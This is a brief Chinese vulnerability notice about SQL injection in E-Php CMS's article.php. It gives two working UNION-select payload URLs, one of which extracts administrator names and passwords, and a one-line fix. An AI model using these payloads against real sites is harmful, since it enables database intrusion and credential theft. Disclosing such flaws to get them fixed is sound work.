E-Php 内容管理系统SQL注射及修复 - 网站安全 - 自

漏洞类型：SQL注入漏洞描述：E-Php Content Management System （CMS），article.php页面存在SQL注射。

漏洞测试：

http://target/path/cms/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12

http://target/path/cms/article.php?es_id=-1+union+select+1,group_concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8,9,10,11,12+from+ephpcat_admin

修复：

过滤article.php页面

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did11106

更新时间：2022-09-13 阅读：59次